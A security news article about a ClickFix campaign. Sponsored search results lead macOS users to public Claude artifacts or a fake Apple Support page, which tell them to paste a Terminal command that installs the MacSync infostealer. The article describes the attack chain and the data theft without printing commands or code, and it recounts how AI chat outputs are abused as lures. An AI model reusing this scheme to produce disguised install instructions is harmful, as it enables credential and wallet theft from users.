ClickFix Attack Exploits Claude LLM Artifacts to Distribute Mac Infostealers
Malicious Actors Exploit Claude LLM Artifacts to Deliver Mac Infostealers
A recent campaign has been discovered that leverages Claude LLM artifacts and Google Ads to distribute infostealer malware to macOS users. The attackers are targeting users who search for specific queries, including online DNS resolver, macOS CLI disk space analyzer, and HomeBrew.
Malicious Activity Involves Claude Artifacts
The malicious activity involves the use of Claude artifacts, which are pieces of content generated by Antropic’s LLM that are publicly accessible via links hosted on the claude.ai domain. These artifacts can contain instructions, guides, code snippets, or other types of output that are isolated from the main chat. However, the pages hosting these artifacts explicitly warn users that the content has not been verified for accuracy.
Attack Variants and Malware Delivery
Researchers at MacPaw’s Moonlock Lab and ad-blocking company AdGuard have identified at least two variants of the malicious campaign. In both cases, the attackers use Google Ads to promote fake search results that lead to either a public Claude artifact or a Medium article impersonating Apple Support. The user is then instructed to paste a shell command into Terminal, which ultimately leads to the installation of the MacSync infostealer malware.
The first variant of the attack uses a command that, when executed, fetches a malware loader from a hardcoded URL. The second variant uses a fake Apple Support page to deliver the malware. In both cases, the malware establishes communication with a command-and-control (C2) infrastructure using a hardcoded token and API key, and spoofs a macOS browser user-agent to evade detection.
Malware Capabilities and Data Exfiltration
Once installed, the MacSync infostealer malware exfiltrates sensitive information from the system, including keychain data, browser information, and crypto wallets. The stolen data is packaged into an archive and exfiltrated to the attacker’s C2 server via an HTTP POST request.
Researcher Observations and Recommendations
Researchers have observed that both variants of the attack fetch the second stage of the malware from the same C2 address, indicating that the same threat actor is behind the campaign. This is not the first time that large language models (LLMs) have been abused in ClickFix attacks. A similar campaign was discovered in December 2025, which leveraged the chat sharing feature in ChatGPT and Grok to deliver the AMOS infostealer.
The use of Claude LLM artifacts in this campaign highlights the expanding abuse of LLMs by threat actors. Users are advised to exercise caution when searching for technical information online and to verify the authenticity of any instructions or guides before following them.
About Author
English